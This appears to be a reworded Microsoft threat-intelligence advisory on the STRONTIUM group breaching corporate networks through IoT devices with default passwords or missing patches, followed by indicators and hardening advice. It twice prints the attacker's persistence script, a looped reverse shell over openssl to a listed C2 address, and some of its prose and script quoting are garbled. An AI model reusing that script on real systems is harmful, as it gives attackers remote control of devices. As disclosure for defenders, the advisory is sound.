According to a number of sources, 50 billion IoT devices will be used globally by 2020. Many Internet of Things ( IoT ) devices simply connect to the internet with little management or oversight, despite the fact that many of them are built with a network connection in mind. Security teams must still be able to identify, maintain, and monitor such devices, particularly in large, complex businesses. Some IoT devices have the ability to receive software updates and even transmit basic telemetry back to the manufacturer. However, the IT operation center for the majority of customers is unaware that they are on the network.
MalwareMustDie, a malware research team, found the Mirai botnet in 2016. IP cameras and basic home routers, two IoT devices frequently found in homes, made up the botnet’s initial components. The list of IoT devices Mirai was aiming for changed as more versions of the program appeared. Eventually, the malware that was responsible for this botnet’s source code was made public online.
The so-called “VPN Filter” malware was found on hundreds of thousands of home and small business networking and storage devices in 2018. The devices would still be susceptible to re-infection unless the user installed the appropriate firmware or security controls, despite the FBI’s public admission that this activity was carried out by a nation-state actor and subsequent steps to disrupt this botnet.
During the PyeongChang 2018 Olympic Games opening ceremonies, there were numerous press reports of cyberattacks on various devices. A few days later, officials did confirm that they had been the victims of malicious cyberattacks that had prevented the main press center’s televisions and internet access from working and prevented attendees from printing their game tickets.
Three IoT gadgets
A known adversary’s infrastructure for communicating with a number of external devices was found in April by security researchers at the Microsoft Threat Intelligence Center. The actor’s attempts to compromise well-known IoT devices ( a VOIP phone, an office printer, and a video decoder ) across multiple customer locations were discovered through additional research. An actor had initially gained access to corporate networks using these tools, according to the investigation. The default manufacturer’s passwords were not changed in two of the cases, and the device had not received the most recent security update in the third.
The actor established a presence on the network and kept looking for more access from these devices, which served as points of entry. The actor was able to find and move across the network in search of higher-privileged accounts that would give them access to more valuable data once they had successfully gained network access. This was made possible by a quick network scan to look for other insecure devices. The actor used tcpdump to monitor local subnet network traffic after gaining access to each IoT device. Additionally, they were observed listing administrative groups in an effort to exploit them further. A straightforward shell script would be dropped as the actor switched between devices in order to establish network persistence, allowing for extended access and continued hunting. The devices were communicating with an external command and control ( C2 ) server, according to network traffic analysis.
—contents of[IOT Device]“file”-
!/bin/sh
export _[IOT Device]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &
-end of file’s contents
Figure 1: network persistence script
The actor is thought to have used the following IP addresses for command and control ( C2 ) during these intrusions:
167.114.153.55
94.237.37.28
82.118.242.171
31.220.61.251
128.199.199.187
Attribution
Microsoft refers to an activity group as STRONTIUM as the source of the attacks on these customers using three well-known IoT devices. We have n’t been able to definitively identify STRONTIUM’s ultimate goals in these intrusions since we first discovered these attacks.
Microsoft has sent nearly 1400 nation-state notifications to STRONTIUM users over the past 12 months. Attacks against non-governmental organizations, think tanks, or politically connected organizations around the world were linked to one in five STRONTIUM activity notifications. Organizations in the following industries—government, IT, military, defense, medicine, education, and engineering—have been the main targets of the remaining 80 % of STRONTIUM attacks. Additionally, we have seen and reported STRONTIUM attacks on anti-doping organizations, the hospitality sector, and Olympic organizing committees. The FBI has also linked STRONTIUM to the “VPN Filter” malware.
action is required
Today, we’re disseminating this data to spread awareness of these dangers across the industry and call for improved IoT device enterprise integration, especially the capacity to track the telemetry of those devices within corporate networks. IoT devices are now more widely used than both personal computers and mobile phones put together. It is simple to see the need for better enterprise management, especially in today’s “bring your own device” world, given that each networked IoT device has its own unique network stack.
We can see from this example that adversaries are happy to take advantage of easier configuration and security issues to further their goals, despite the fact that the majority of the industry focuses on the risks associated with hardware implants. As more IoT devices are used in corporate settings, these straightforward attacks that take advantage of poor device management are probably going to get worse. After completing our investigation, we informed the manufacturers of the relevant devices involved, and they used the occasion to look into additional product protections. However, in order to make it simpler for security teams to defend their networks, IoT device manufacturers need to provide better enterprise support and monitoring capabilities. This is true for both security team at organizations that need more awareness of these types of threats.
Compromise Indicators
The indicators that Microsoft has seen active during the STRONTIUM activity covered in this article are listed below.
IP addresses for Command and Control ( C2 )
167.114.153.55
94.237.37.28
82.118.242.171
31.220.61.251
128.199.199.187
Script for preserving persistence on a networked device
--contents of[IOT Device]“file”-
!/bin/sh
export _[IOT Device]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &
-end of file’s contents
Advice for securing enterprise internet of things
An organization can take additional precautions to safeguard its network and infrastructure from similar activity. To better protect and control risk related to IoT devices, Microsoft suggests the following steps:
- Any IoT devices operating in your corporate environment must be approved and cataloged.
- For each IoT device, create a unique security policy.
- Create unique access controls to reduce exposure or refrain from directly exposing IoT devices to the internet.
- If at all possible, use a separate network for IoT devices.
- Regularly audit deployed IoT devices for configuration and patching.
- Establish guidelines for device isolation, data preservation, device log maintenance, and device image capture for forensic investigations.
- Red Team testing should take into account any IoT-based intrusion scenarios or device configuration weaknesses.
- Keep an eye out for unusual behavior on IoT devices, such as a printer browsing SharePoint sites.
- Verify who has permission to access IoT devices, users, and processes by auditing their identities and credentials.
- If possible, centralize asset, configuration, and patch management.
- Include explicit clauses in your contracts describing the security procedures to be followed and audits that report the health and security status of all managed devices if your devices are deployed/managed by a third party.
- Create SLA Terms in IoT device vendor contracts whenever possible to establish a mutually acceptable window for product-related investigations and forensic analysis.
On August 8, 2019, Eric Doerr will give a number of presentations at Black Hat, where Microsoft is urging greater industry transparency to make sure that defenders are best prepared to deal with threats from well-equipped foes.
Threat Intelligence Center ( MSTIC ) from Microsoft